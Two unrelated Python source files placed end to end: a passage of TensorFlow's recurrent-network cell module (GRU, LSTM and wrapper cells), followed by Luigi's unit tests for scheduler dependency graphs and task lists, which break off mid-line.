tuple of integers, this should be a tuple with shapes `[batch_size x s] for s in self.state_size`. scope: VariableScope for the created subgraph; defaults to class name. Returns: A pair containing: - Output: A `2-D` tensor with shape `[batch_size x self.output_size]`. - New state: Either a single `2-D` tensor, or a tuple of tensors matching the arity and shapes of `state`. """ raise NotImplementedError("Abstract method") @property def state_size(self): """size(s) of state(s) used by this cell. It can be represented by an Integer, a TensorShape or a tuple of Integers or TensorShapes. """ raise NotImplementedError("Abstract method") @property def output_size(self): """Integer or TensorShape: size of outputs produced by this cell.""" raise NotImplementedError("Abstract method") def zero_state(self, batch_size, dtype): """Return zero-filled state tensor(s). Args: batch_size: int, float, or unit Tensor representing the batch size. dtype: the data type to use for the state. Returns: If `state_size` is an int or TensorShape, then the return value is a `N-D` tensor of shape `[batch_size x state_size]` filled with zeros. If `state_size` is a nested list or tuple, then the return value is a nested list or tuple (of the same structure) of `2-D` tensors with the shapes `[batch_size x s]` for each s in `state_size`. """ state_size = self.state_size if nest.is_sequence(state_size): state_size_flat = nest.flatten(state_size) zeros_flat = [ array_ops.zeros( array_ops.pack(_state_size_with_prefix(s, prefix=[batch_size])), dtype=dtype) for s in state_size_flat] for s, z in zip(state_size_flat, zeros_flat): z.set_shape(_state_size_with_prefix(s, prefix=[None])) zeros = nest.pack_sequence_as(structure=state_size, flat_sequence=zeros_flat) else: zeros_size = _state_size_with_prefix(state_size, prefix=[batch_size]) zeros = array_ops.zeros(array_ops.pack(zeros_size), dtype=dtype) zeros.set_shape(_state_size_with_prefix(state_size, prefix=[None])) return zeros class BasicRNNCell(RNNCell): """The most basic RNN cell.""" def __init__(self, num_units, input_size=None, activation=tanh): if input_size is not None: logging.warn("%s: The input_size parameter is deprecated.", self) self._num_units = num_units self._activation = activation @property def state_size(self): return self._num_units @property def output_size(self): return self._num_units def __call__(self, inputs, state, scope=None): """Most basic RNN: output = new_state = act(W * input + U * state + B).""" with vs.variable_scope(scope or "basic_rnn_cell"): output = self._activation( _linear([inputs, state], self._num_units, True, scope=scope)) return output, output class GRUCell(RNNCell): """Gated Recurrent Unit cell (cf. http://arxiv.org/abs/1406.1078).""" def __init__(self, num_units, input_size=None, activation=tanh): if input_size is not None: logging.warn("%s: The input_size parameter is deprecated.", self) self._num_units = num_units self._activation = activation @property def state_size(self): return self._num_units @property def output_size(self): return self._num_units def __call__(self, inputs, state, scope=None): """Gated recurrent unit (GRU) with nunits cells.""" with vs.variable_scope(scope or "gru_cell"): with vs.variable_scope("gates"): # Reset gate and update gate. # We start with bias of 1.0 to not reset and not update. r, u = array_ops.split( 1, 2, _linear([inputs, state], 2 * self._num_units, True, 1.0, scope=scope)) r, u = sigmoid(r), sigmoid(u) with vs.variable_scope("candidate"): c = self._activation(_linear([inputs, r * state], self._num_units, True, scope=scope)) new_h = u * state + (1 - u) * c return new_h, new_h _LSTMStateTuple = collections.namedtuple("LSTMStateTuple", ("c", "h")) class LSTMStateTuple(_LSTMStateTuple): """Tuple used by LSTM Cells for `state_size`, `zero_state`, and output state. Stores two elements: `(c, h)`, in that order. Only used when `state_is_tuple=True`. """ __slots__ = () @property def dtype(self): (c, h) = self if not c.dtype == h.dtype: raise TypeError("Inconsistent internal state: %s vs %s" % (str(c.dtype), str(h.dtype))) return c.dtype class BasicLSTMCell(RNNCell): """Basic LSTM recurrent network cell. The implementation is based on: http://arxiv.org/abs/1409.2329. We add forget_bias (default: 1) to the biases of the forget gate in order to reduce the scale of forgetting in the beginning of the training. It does not allow cell clipping, a projection layer, and does not use peep-hole connections: it is the basic baseline. For advanced models, please use the full LSTMCell that follows. """ def __init__(self, num_units, forget_bias=1.0, input_size=None, state_is_tuple=True, activation=tanh): """Initialize the basic LSTM cell. Args: num_units: int, The number of units in the LSTM cell. forget_bias: float, The bias added to forget gates (see above). input_size: Deprecated and unused. state_is_tuple: If True, accepted and returned states are 2-tuples of the `c_state` and `m_state`. If False, they are concatenated along the column axis. The latter behavior will soon be deprecated. activation: Activation function of the inner states. """ if not state_is_tuple: logging.warn("%s: Using a concatenated state is slower and will soon be " "deprecated. Use state_is_tuple=True.", self) if input_size is not None: logging.warn("%s: The input_size parameter is deprecated.", self) self._num_units = num_units self._forget_bias = forget_bias self._state_is_tuple = state_is_tuple self._activation = activation @property def state_size(self): return (LSTMStateTuple(self._num_units, self._num_units) if self._state_is_tuple else 2 * self._num_units) @property def output_size(self): return self._num_units def __call__(self, inputs, state, scope=None): """Long short-term memory cell (LSTM).""" with vs.variable_scope(scope or "basic_lstm_cell"): # Parameters of gates are concatenated into one multiply for efficiency. if self._state_is_tuple: c, h = state else: c, h = array_ops.split(1, 2, state) concat = _linear([inputs, h], 4 * self._num_units, True, scope=scope) # i = input_gate, j = new_input, f = forget_gate, o = output_gate i, j, f, o = array_ops.split(1, 4, concat) new_c = (c * sigmoid(f + self._forget_bias) + sigmoid(i) * self._activation(j)) new_h = self._activation(new_c) * sigmoid(o) if self._state_is_tuple: new_state = LSTMStateTuple(new_c, new_h) else: new_state = array_ops.concat(1, [new_c, new_h]) return new_h, new_state class LSTMCell(RNNCell): """Long short-term memory unit (LSTM) recurrent network cell. The default non-peephole implementation is based on: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf S. Hochreiter and J. Schmidhuber. "Long Short-Term Memory". Neural Computation, 9(8):1735-1780, 1997. The peephole implementation is based on: https://research.google.com/pubs/archive/43905.pdf Hasim Sak, Andrew Senior, and Francoise Beaufays. "Long short-term memory recurrent neural network architectures for large scale acoustic modeling." INTERSPEECH, 2014. The class uses optional peep-hole connections, optional cell clipping, and an optional projection layer. """ def __init__(self, num_units, input_size=None, use_peepholes=False, cell_clip=None, initializer=None, num_proj=None, proj_clip=None, num_unit_shards=None, num_proj_shards=None, forget_bias=1.0, state_is_tuple=True, activation=tanh): """Initialize the parameters for an LSTM cell. Args: num_units: int, The number of units in the LSTM cell input_size: Deprecated and unused. use_peepholes: bool, set True to enable diagonal/peephole connections. cell_clip: (optional) A float value, if provided the cell state is clipped by this value prior to the cell output activation. initializer: (optional) The initializer to use for the weight and projection matrices. num_proj: (optional) int, The output dimensionality for the projection matrices. If None, no projection is performed. proj_clip: (optional) A float value. If `num_proj > 0` and `proj_clip` is provided, then the projected values are clipped elementwise to within `[-proj_clip, proj_clip]`. num_unit_shards: Deprecated, will be removed by Jan. 2017. Use a variable_scope partitioner instead. num_proj_shards: Deprecated, will be removed by Jan. 2017. Use a variable_scope partitioner instead. forget_bias: Biases of the forget gate are initialized by default to 1 in order to reduce the scale of forgetting at the beginning of the training. state_is_tuple: If True, accepted and returned states are 2-tuples of the `c_state` and `m_state`. If False, they are concatenated along the column axis. This latter behavior will soon be deprecated. activation: Activation function of the inner states. """ if not state_is_tuple: logging.warn("%s: Using a concatenated state is slower and will soon be " "deprecated. Use state_is_tuple=True.", self) if input_size is not None: logging.warn("%s: The input_size parameter is deprecated.", self) if num_unit_shards is not None or num_proj_shards is not None: logging.warn( "%s: The num_unit_shards and proj_unit_shards parameters are " "deprecated and will be removed in Jan 2017. " "Use a variable scope with a partitioner instead.", self) self._num_units = num_units self._use_peepholes = use_peepholes self._cell_clip = cell_clip self._initializer = initializer self._num_proj = num_proj self._proj_clip = proj_clip self._num_unit_shards = num_unit_shards self._num_proj_shards = num_proj_shards self._forget_bias = forget_bias self._state_is_tuple = state_is_tuple self._activation = activation if num_proj: self._state_size = ( LSTMStateTuple(num_units, num_proj) if state_is_tuple else num_units + num_proj) self._output_size = num_proj else: self._state_size = ( LSTMStateTuple(num_units, num_units) if state_is_tuple else 2 * num_units) self._output_size = num_units @property def state_size(self): return self._state_size @property def output_size(self): return self._output_size def __call__(self, inputs, state, scope=None): """Run one step of LSTM. Args: inputs: input Tensor, 2D, batch x num_units. state: if `state_is_tuple` is False, this must be a state Tensor, `2-D, batch x state_size`. If `state_is_tuple` is True, this must be a tuple of state Tensors, both `2-D`, with column sizes `c_state` and `m_state`. scope: VariableScope for the created subgraph; defaults to "lstm_cell". Returns: A tuple containing: - A `2-D, [batch x output_dim]`, Tensor representing the output of the LSTM after reading `inputs` when previous state was `state`. Here output_dim is: num_proj if num_proj was set, num_units otherwise. - Tensor(s) representing the new state of LSTM after reading `inputs` when the previous state was `state`. Same type and shape(s) as `state`. Raises: ValueError: If input size cannot be inferred from inputs via static shape inference. """ num_proj = self._num_units if self._num_proj is None else self._num_proj if self._state_is_tuple: (c_prev, m_prev) = state else: c_prev = array_ops.slice(state, [0, 0], [-1, self._num_units]) m_prev = array_ops.slice(state, [0, self._num_units], [-1, num_proj]) dtype = inputs.dtype input_size = inputs.get_shape().with_rank(2)[1] if input_size.value is None: raise ValueError("Could not infer input size from inputs.get_shape()[-1]") with vs.variable_scope(scope or "lstm_cell", initializer=self._initializer) as unit_scope: if self._num_unit_shards is not None: unit_scope.set_partitioner( partitioned_variables.fixed_size_partitioner( self._num_unit_shards)) # i = input_gate, j = new_input, f = forget_gate, o = output_gate lstm_matrix = _linear([inputs, m_prev], 4 * self._num_units, bias=True, scope=scope) i, j, f, o = array_ops.split(1, 4, lstm_matrix) # Diagonal connections if self._use_peepholes: with vs.variable_scope(unit_scope) as projection_scope: if self._num_unit_shards is not None: projection_scope.set_partitioner(None) w_f_diag = vs.get_variable( "w_f_diag", shape=[self._num_units], dtype=dtype) w_i_diag = vs.get_variable( "w_i_diag", shape=[self._num_units], dtype=dtype) w_o_diag = vs.get_variable( "w_o_diag", shape=[self._num_units], dtype=dtype) if self._use_peepholes: c = (sigmoid(f + self._forget_bias + w_f_diag * c_prev) * c_prev + sigmoid(i + w_i_diag * c_prev) * self._activation(j)) else: c = (sigmoid(f + self._forget_bias) * c_prev + sigmoid(i) * self._activation(j)) if self._cell_clip is not None: # pylint: disable=invalid-unary-operand-type c = clip_ops.clip_by_value(c, -self._cell_clip, self._cell_clip) # pylint: enable=invalid-unary-operand-type if self._use_peepholes: m = sigmoid(o + w_o_diag * c) * self._activation(c) else: m = sigmoid(o) * self._activation(c) if self._num_proj is not None: with vs.variable_scope("projection") as proj_scope: if self._num_proj_shards is not None: proj_scope.set_partitioner( partitioned_variables.fixed_size_partitioner( self._num_proj_shards)) m = _linear(m, self._num_proj, bias=False, scope=scope) if self._proj_clip is not None: # pylint: disable=invalid-unary-operand-type m = clip_ops.clip_by_value(m, -self._proj_clip, self._proj_clip) # pylint: enable=invalid-unary-operand-type new_state = (LSTMStateTuple(c, m) if self._state_is_tuple else array_ops.concat(1, [c, m])) return m, new_state class OutputProjectionWrapper(RNNCell): """Operator adding an output projection to the given cell. Note: in many cases it may be more efficient to not use this wrapper, but instead concatenate the whole sequence of your outputs in time, do the projection on this batch-concatenated sequence, then split it if needed or directly feed into a softmax. """ def __init__(self, cell, output_size): """Create a cell with output projection. Args: cell: an RNNCell, a projection to output_size is added to it. output_size: integer, the size of the output after projection. Raises: TypeError: if cell is not an RNNCell. ValueError: if output_size is not positive. """ if not isinstance(cell, RNNCell): raise TypeError("The parameter cell is not RNNCell.") if output_size < 1: raise ValueError("Parameter output_size must be > 0: %d." % output_size) self._cell = cell self._output_size = output_size @property def state_size(self): return self._cell.state_size @property def output_size(self): return self._output_size def __call__(self, inputs, state, scope=None): """Run the cell and output projection on inputs, starting from state.""" output, res_state = self._cell(inputs, state) # Default scope: "OutputProjectionWrapper" with vs.variable_scope(scope or "output_projection_wrapper"): projected = _linear(output, self._output_size, True, scope=scope) return projected, res_state class InputProjectionWrapper(RNNCell): """Operator adding an input projection to the given cell. Note: in many cases it may be more efficient to not use this wrapper, but instead concatenate the whole sequence of your inputs in time, do the projection on this batch-concatenated sequence, then split it. """ def __init__(self, cell, num_proj, input_size=None): """Create a cell with input projection. Args: cell: an RNNCell, a projection of inputs is added before it. num_proj: Python integer. The dimension to project to. input_size: Deprecated and unused. Raises: TypeError: if cell is not an RNNCell. """ if input_size is not None: logging.warn("%s: The input_size parameter is deprecated.", self) if not isinstance(cell, RNNCell): raise TypeError("The parameter cell is not RNNCell.") self._cell = cell self._num_proj = num_proj @property def state_size(self): return self._cell.state_size @property def output_size(self): return self._cell.output_size def __call__(self, inputs, state, scope=None): """Run the input projection and then the cell.""" # Default scope: "InputProjectionWrapper" with vs.variable_scope(scope or "input_projection_wrapper"): projected = _linear(inputs, self._num_proj, True, scope=scope) return self._cell(projected, state) class DropoutWrapper(RNNCell): """Operator adding dropout to inputs and outputs of the given cell.""" def __init__(self, cell, input_keep_prob=1.0, output_keep_prob=1.0, seed=None): """Create a cell with added input and/or output dropout. Dropout is never used on the state. Args: cell: an RNNCell, a projection to output_size is added to it. input_keep_prob: unit Tensor or float between 0 and 1, input keep probability; if it is float and 1, no input dropout will be added. output_keep_prob: unit Tensor or float between 0 and 1, output keep probability; if it is float and 1, no output dropout will be added. seed: (optional) integer, the randomness seed. Raises: TypeError: if cell is not an RNNCell. ValueError: if keep_prob is not between 0 and 1. """ if not isinstance(cell, RNNCell): raise TypeError("The parameter cell is not a RNNCell.") if (isinstance(input_keep_prob, float) and not (input_keep_prob >= 0.0 and input_keep_prob <= 1.0)): raise ValueError("Parameter input_keep_prob must be between 0 and 1: %d" % input_keep_prob) if (isinstance(output_keep_prob, float) and not (output_keep_prob >= 0.0 and output_keep_prob <= 1.0)): raise ValueError("Parameter output_keep_prob must be between 0 and 1: %d" % output_keep_prob) self._cell = cell self._input_keep_prob = input_keep_prob self._output_keep_prob = output_keep_prob self._seed = seed @property def state_size(self): return self._cell.state_size @property def output_size(self): return self._cell.output_size def __call__(self, inputs, state, scope=None): """Run the cell with the declared dropouts.""" if (not isinstance(self._input_keep_prob, float) or self._input_keep_prob < 1): inputs = nn_ops.dropout(inputs, self._input_keep_prob, seed=self._seed) output, new_state = self._cell(inputs, state, scope) if (not isinstance(self._output_keep_prob, float) or self._output_keep_prob < 1): output = nn_ops.dropout(output, self._output_keep_prob, seed=self._seed) return output, new_state class EmbeddingWrapper(RNNCell): """Operator adding input embedding to the given cell. Note: in many cases it may be more efficient to not use this wrapper, but instead concatenate the whole sequence of your inputs in time, do the embedding on this batch-concatenated sequence, then split it and feed into your RNN. """ def __init__(self, cell, embedding_classes, embedding_size, initializer=None): """Create a cell with an added input embedding. Args: cell: an RNNCell, an embedding will be put before its inputs. embedding_classes: integer, how many symbols will be embedded. embedding_size: integer, the size of the vectors we embed into. initializer: an initializer to use when creating the embedding; if None, the initializer from variable scope or a default one is used. Raises: TypeError: if cell is not an RNNCell. ValueError: if embedding_classes is not positive. """ if not isinstance(cell, RNNCell): raise TypeError("The parameter cell is not RNNCell.") if embedding_classes <= 0 or embedding_size <= 0: raise ValueError("Both embedding_classes and embedding_size must be > 0: " "%d, %d." % (embedding_classes, embedding_size)) self._cell = cell self._embedding_classes = embedding_classes self._embedding_size = embedding_size self._initializer = initializer @property def state_size(self): return self._cell.state_size @property def output_size(self): return self._cell.output_size def __call__(self, inputs, state, scope=None): """Run the cell on embedded inputs.""" with vs.variable_scope(scope or "embedding_wrapper"): # "EmbeddingWrapper" with ops.device("/cpu:0"): if self._initializer: initializer = self._initializer elif vs.get_variable_scope().initializer: initializer = vs.get_variable_scope().initializer else: # Default initializer for embeddings should have variance=1. sqrt3 = math.sqrt(3) # Uniform(-sqrt(3), sqrt(3)) has variance=1. initializer = init_ops.random_uniform_initializer(-sqrt3, sqrt3) if type(state) is tuple: data_type = state[0].dtype else: data_type = state.dtype embedding = vs.get_variable( "embedding", [self._embedding_classes, self._embedding_size], initializer=initializer, dtype=data_type) embedded = embedding_ops.embedding_lookup( embedding, array_ops.reshape(inputs, [-1])) return self._cell(embedded, state) class MultiRNNCell(RNNCell): """RNN cell composed sequentially of multiple simple cells.""" def __init__(self, cells, state_is_tuple=True): """Create a RNN cell composed sequentially of a number of RNNCells. Args: cells: list of RNNCells that will be composed in this order. state_is_tuple: If True, accepted and returned states are n-tuples, where `n = len(cells)`. If False, the states are all concatenated along the column axis. This latter behavior will soon be deprecated. Raises: ValueError: if cells is empty (not allowed), or at least one of the cells returns a state tuple but the flag `state_is_tuple` is `False`. """ if not cells: raise ValueError("Must specify at least one cell for MultiRNNCell.") self._cells = cells self._state_is_tuple = state_is_tuple if not state_is_tuple: if any(nest.is_sequence(c.state_size) for c in self._cells): raise ValueError("Some cells return tuples of states, but the flag " "state_is_tuple is not set. State sizes are: %s" % str([c.state_size for c in self._cells])) @property def state_size(self): if self._state_is_tuple: return tuple(cell.state_size for cell in self._cells) else: return sum([cell.state_size for cell in self._cells]) @property def output_size(self): return self._cells[-1].output_size def __call__(self, inputs, state, scope=None): """Run this multi-layer cell on inputs, starting from state.""" with vs.variable_scope(scope or "multi_rnn_cell"): cur_state_pos = 0 cur_inp = inputs new_states = [] for i, cell in enumerate(self._cells): with vs.variable_scope("cell_%d" % i): if self._state_is_tuple: if not nest.is_sequence(state): raise ValueError( "Expected state to be a tuple of length %d, but received: %s" % (len(self.state_size), state)) cur_state = state[i] else: cur_state = array_ops.slice( state, [0, cur_state_pos], [-1, cell.state_size]) cur_state_pos += cell.state_size cur_inp, new_state = cell(cur_inp, cur_state) new_states.append(new_state) new_states = (tuple(new_states) if self._state_is_tuple else array_ops.concat(1, new_states)) return cur_inp, new_states class _SlimRNNCell(RNNCell): """A simple wrapper for slim.rnn_cells.""" def __init__(self, cell_fn): """Create a SlimRNNCell from a cell_fn. Args: cell_fn: a function which takes (inputs, state, scope) and produces the outputs and the new_state. Additionally when called with inputs=None and state=None it should return (initial_outputs, initial_state). Raises: TypeError: if cell_fn is not callable ValueError: if cell_fn cannot produce a valid initial state. """ if not callable(cell_fn): raise TypeError("cell_fn %s needs to be callable", cell_fn) self._cell_fn = cell_fn self._cell_name = cell_fn.func.__name__ init_output, init_state = self._cell_fn(None, None) output_shape = init_output.get_shape() state_shape = init_state.get_shape() self._output_size = output_shape.with_rank(2)[1].value self._state_size = state_shape.with_rank(2)[1].value if self._output_size is None: raise ValueError("Initial output created by %s has invalid shape %s" % (self._cell_name, output_shape)) if self._state_size is None: raise ValueError("Initial state created by %s has invalid shape %s" % (self._cell_name, state_shape)) @property def state_size(self): return self._state_size @property def output_size(self): return self._output_size def __call__(self, inputs, state, scope=None): scope = scope or self._cell_name output, state = self._cell_fn(inputs, state, scope=scope) return output, state def _linear(args, output_size, bias, bias_start=0.0, scope=None): """Linear map: sum_i(args[i] * W[i]), where W[i] is a variable. Args: args: a 2D Tensor or a list of 2D, batch x n, Tensors. output_size: int, second dimension of W[i]. bias: boolean, whether to add a bias term or not. bias_start: starting value to initialize the bias; 0 by default. scope: (optional) Variable scope to create parameters in. Returns: A 2D Tensor with shape [batch x output_size] equal to sum_i(args[i] * W[i]), where W[i]s are newly created matrices. Raises: ValueError: if some of the arguments has unspecified or wrong shape. """ if args is None or (nest.is_sequence(args) and not args): raise ValueError("`args` must be specified") if not nest.is_sequence(args): args = [args] # Calculate the total size of arguments on dimension 1. total_arg_size = 0 shapes = [a.get_shape() for a in args] for shape in shapes: if shape.ndims != 2: raise ValueError("linear is expecting 2D arguments: %s" % shapes) if shape[1].value is None: raise ValueError("linear expects shape[1] to be provided for shape %s, " "but saw %d" % (shape, shape[1])) else: total_arg_size += shape[1].value dtype = [a.dtype for a in args][0] # Now the computation. scope = vs.get_variable_scope() with vs.variable_scope(scope) as outer_scope: weights = vs.get_variable( "weights", [total_arg_size, output_size], dtype=dtype) if len(args) == 1: res = math_ops.matmul(args[0], weights) else: res = math_ops.matmul(array_ops.concat(1, args), weights) if not bias: return res with vs.variable_scope(outer_scope) as inner_scope: inner_scope.set_partitioner(None) biases = vs.get_variable( "biases", [output_size], dtype=dtype, initializer=init_ops.constant_initializer(bias_start, dtype=dtype)) return nn_ops.bias_add(res, biases)
# -*- coding: utf-8 -*- # # Copyright 2012-2015 Spotify AB # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from __future__ import division import os import tempfile import time from helpers import unittest import luigi import luigi.notifications import luigi.scheduler import luigi.six as six import luigi.worker luigi.notifications.DEBUG = True tempdir = tempfile.mkdtemp() class DummyTask(luigi.Task): task_id = luigi.Parameter() def run(self): f = self.output().open('w') f.close() def output(self): return luigi.LocalTarget(os.path.join(tempdir, str(self))) class FactorTask(luigi.Task): product = luigi.Parameter() def requires(self): for factor in range(2, self.product): if self.product % factor == 0: yield FactorTask(factor) yield FactorTask(self.product // factor) return def run(self): f = self.output().open('w') f.close() def output(self): return luigi.LocalTarget(os.path.join(tempdir, 'luigi_test_factor_%d' % self.product)) class BadReqTask(luigi.Task): succeed = luigi.BoolParameter() def requires(self): assert self.succeed yield BadReqTask(False) def run(self): pass def complete(self): return False class FailingTask(luigi.Task): task_namespace = __name__ task_id = luigi.Parameter() def run(self): raise Exception("Error Message") class OddFibTask(luigi.Task): n = luigi.IntParameter() done = luigi.BoolParameter(default=True, significant=False) def requires(self): if self.n > 1: yield OddFibTask(self.n - 1, self.done) yield OddFibTask(self.n - 2, self.done) def complete(self): return self.n % 2 == 0 and self.done def run(self): assert False class SchedulerVisualisationTest(unittest.TestCase): def setUp(self): self.scheduler = luigi.scheduler.Scheduler() def tearDown(self): pass def _assert_complete(self, tasks): for t in tasks: self.assert_(t.complete()) def _build(self, tasks): with luigi.worker.Worker(scheduler=self.scheduler, worker_processes=1) as w: for t in tasks: w.add(t) w.run() def _remote(self): return self.scheduler def _test_run(self, workers): tasks = [DummyTask(i) for i in range(20)] self._build(tasks, workers=workers) self._assert_complete(tasks) def test_graph(self): start = time.time() tasks = [DummyTask(task_id=1), DummyTask(task_id=2)] self._build(tasks) self._assert_complete(tasks) end = time.time() remote = self._remote() graph = remote.graph() self.assertEqual(len(graph), 2) self.assert_(DummyTask(task_id=1).task_id in graph) d1 = graph[DummyTask(task_id=1).task_id] self.assertEqual(d1[u'status'], u'DONE') self.assertEqual(d1[u'deps'], []) self.assertGreaterEqual(d1[u'start_time'], start) self.assertLessEqual(d1[u'start_time'], end) d2 = graph[DummyTask(task_id=2).task_id] self.assertEqual(d2[u'status'], u'DONE') self.assertEqual(d2[u'deps'], []) self.assertGreaterEqual(d2[u'start_time'], start) self.assertLessEqual(d2[u'start_time'], end) def test_large_graph_truncate(self): class LinearTask(luigi.Task): idx = luigi.IntParameter() def requires(self): if self.idx > 0: yield LinearTask(self.idx - 1) def complete(self): return False root_task = LinearTask(100) self.scheduler = luigi.scheduler.Scheduler(max_graph_nodes=10) self._build([root_task]) graph = self.scheduler.dep_graph(root_task.task_id) self.assertEqual(10, len(graph)) expected_nodes = [LinearTask(i).task_id for i in range(100, 90, -1)] six.assertCountEqual(self, expected_nodes, graph) def test_large_inverse_graph_truncate(self): class LinearTask(luigi.Task): idx = luigi.IntParameter() def requires(self): if self.idx > 0: yield LinearTask(self.idx - 1) def complete(self): return False root_task = LinearTask(100) self.scheduler = luigi.scheduler.Scheduler(max_graph_nodes=10) self._build([root_task]) graph = self.scheduler.inverse_dep_graph(LinearTask(0).task_id) self.assertEqual(10, len(graph)) expected_nodes = [LinearTask(i).task_id for i in range(10)] six.assertCountEqual(self, expected_nodes, graph) def test_truncate_graph_with_full_levels(self): class BinaryTreeTask(luigi.Task): idx = luigi.IntParameter() def requires(self): if self.idx < 100: return map(BinaryTreeTask, (self.idx * 2, self.idx * 2 + 1)) root_task = BinaryTreeTask(1) self.scheduler = luigi.scheduler.Scheduler(max_graph_nodes=10) self._build([root_task]) graph = self.scheduler.dep_graph(root_task.task_id) self.assertEqual(10, len(graph)) expected_nodes = [BinaryTreeTask(i).task_id for i in range(1, 11)] six.assertCountEqual(self, expected_nodes, graph) def test_truncate_graph_with_multiple_depths(self): class LinearTask(luigi.Task): idx = luigi.IntParameter() def requires(self): if self.idx > 0: yield LinearTask(self.idx - 1) yield LinearTask(0) def complete(self): return False root_task = LinearTask(100) self.scheduler = luigi.scheduler.Scheduler(max_graph_nodes=10) self._build([root_task]) graph = self.scheduler.dep_graph(root_task.task_id) self.assertEqual(10, len(graph)) expected_nodes = [LinearTask(i).task_id for i in range(100, 91, -1)] +\ [LinearTask(0).task_id] self.maxDiff = None six.assertCountEqual(self, expected_nodes, graph) def _assert_all_done(self, tasks): self._assert_all(tasks, u'DONE') def _assert_all(self, tasks, status): for task in tasks.values(): self.assertEqual(task[u'status'], status) def test_dep_graph_single(self): self._build([FactorTask(1)]) remote = self._remote() dep_graph = remote.dep_graph(FactorTask(product=1).task_id) self.assertEqual(len(dep_graph), 1) self._assert_all_done(dep_graph) d1 = dep_graph.get(FactorTask(product=1).task_id) self.assertEqual(type(d1), type({})) self.assertEqual(d1[u'deps'], []) def test_dep_graph_not_found(self): self._build([FactorTask(1)]) remote = self._remote() dep_graph = remote.dep_graph(FactorTask(product=5).task_id) self.assertEqual(len(dep_graph), 0) def test_inverse_dep_graph_not_found(self): self._build([FactorTask(1)]) remote = self._remote() dep_graph = remote.inverse_dep_graph('FactorTask(product=5)') self.assertEqual(len(dep_graph), 0) def test_dep_graph_tree(self): self._build([FactorTask(30)]) remote = self._remote() dep_graph = remote.dep_graph(FactorTask(product=30).task_id) self.assertEqual(len(dep_graph), 5) self._assert_all_done(dep_graph) d30 = dep_graph[FactorTask(product=30).task_id] self.assertEqual(sorted(d30[u'deps']), sorted([FactorTask(product=15).task_id, FactorTask(product=2).task_id])) d2 = dep_graph[FactorTask(product=2).task_id] self.assertEqual(sorted(d2[u'deps']), []) d15 = dep_graph[FactorTask(product=15).task_id] self.assertEqual(sorted(d15[u'deps']), sorted([FactorTask(product=3).task_id, FactorTask(product=5).task_id])) d3 = dep_graph[FactorTask(product=3).task_id] self.assertEqual(sorted(d3[u'deps']), []) d5 = dep_graph[FactorTask(product=5).task_id] self.assertEqual(sorted(d5[u'deps']), []) def test_dep_graph_missing_deps(self): self._build([BadReqTask(True)]) dep_graph = self._remote().dep_graph(BadReqTask(succeed=True).task_id) self.assertEqual(len(dep_graph), 2) suc = dep_graph[BadReqTask(succeed=True).task_id] self.assertEqual(suc[u'deps'], [BadReqTask(succeed=False).task_id]) fail = dep_graph[BadReqTask(succeed=False).task_id] self.assertEqual(fail[u'name'], 'BadReqTask') self.assertEqual(fail[u'params'], {'succeed': 'False'}) self.assertEqual(fail[u'status'], 'UNKNOWN') def test_dep_graph_diamond(self): self._build([FactorTask(12)]) remote = self._remote() dep_graph = remote.dep_graph(FactorTask(product=12).task_id) self.assertEqual(len(dep_graph), 4) self._assert_all_done(dep_graph) d12 = dep_graph[FactorTask(product=12).task_id] self.assertEqual(sorted(d12[u'deps']), sorted([FactorTask(product=2).task_id, FactorTask(product=6).task_id])) d6 = dep_graph[FactorTask(product=6).task_id] self.assertEqual(sorted(d6[u'deps']), sorted([FactorTask(product=2).task_id, FactorTask(product=3).task_id])) d3 = dep_graph[FactorTask(product=3).task_id] self.assertEqual(sorted(d3[u'deps']), []) d2 = dep_graph[FactorTask(product=2).task_id] self.assertEqual(sorted(d2[u'deps']), []) def test_dep_graph_skip_done(self): task = OddFibTask(9) self._build([task]) remote = self._remote() task_id = task.task_id self.assertEqual(9, len(remote.dep_graph(task_id, include_done=True))) skip_done_graph = remote.dep_graph(task_id, include_done=False) self.assertEqual(5, len(skip_done_graph)) for task in skip_done_graph.values(): self.assertNotEqual('DONE', task['status']) self.assertLess(len(task['deps']), 2) def test_inverse_dep_graph_skip_done(self): self._build([OddFibTask(9, done=False)]) self._build([OddFibTask(9, done=True)]) remote = self._remote() task_id = OddFibTask(1).task_id self.assertEqual(9, len(remote.inverse_dep_graph(task_id, include_done=True))) skip_done_graph = remote.inverse_dep_graph(task_id, include_done=False) self.assertEqual(5, len(skip_done_graph)) for task in skip_done_graph.values(): self.assertNotEqual('DONE', task['status']) self.assertLess(len(task['deps']), 2) def test_task_list_single(self): self._build([FactorTask(7)]) remote = self._remote() tasks_done = remote.task_list('DONE', '') self.assertEqual(len(tasks_done), 1) self._assert_all_done(tasks_done) t7 = tasks_done.get(FactorTask(product=7).task_id) self.assertEqual(type(t7), type({})) self.assertEqual(remote.task_list('', ''), tasks_done) self.assertEqual(remote.task_list('FAILED', ''), {}) self.assertEqual(remote.task_list('PENDING', ''), {}) def test_dep_graph_root_has_display_name(self): root_task = FactorTask(12) self._build([root_task]) dep_graph = self._remote().dep_graph(root_task.task_id) self.assertEqual('FactorTask(product=12)', dep_graph[root_task.task_id]['display_name']) def test_dep_graph_non_root_nodes_lack_display_name(self): root_task = FactorTask(12) self._build([root_task]) dep_graph = self._remote().dep_graph(root_task.task_id) for task_id, node in dep_graph.items(): if task_id != root_task.task_id: self.assertNotIn('display_name', node) def test_task_list_failed(self): self._build([FailingTask(8)]) remote = self._remote() failed = remote.task_list('FAILED', '') self.assertEqual(len(failed), 1) f8 = failed.get(FailingTask(task_id=8).task_id) self.assertEqual(f8[u'status'], u'FAILED') self.assertEqual(remote.task_list('DONE', ''), {}) self.assertEqual(remote.task_list('PENDING', ''), {}) def test_task_list_upstream_status(self): class A(luigi.ExternalTask): pass class B(luigi.ExternalTask): def complete(self): return True class C(luigi.Task): def requires(self): return [A(), B()] class F(luigi.Task): def run(self): raise Exception() class D(luigi.Task): def requires(self): return [F()] class E(luigi.Task): def requires(self): return [C(), D()] self._build([E()]) remote = self._remote() done = remote.task_list('DONE', '') self.assertEqual(len(done), 1) db = done.get(B().task_id) self.assertEqual(db['status'], 'DONE') missing_input = remote.task_list('PENDING', 'UPSTREAM_MISSING_INPUT') self.assertEqual(len(missing_input), 2) pa = missing_input.get(A().task_id) self.assertEqual(pa['status'], 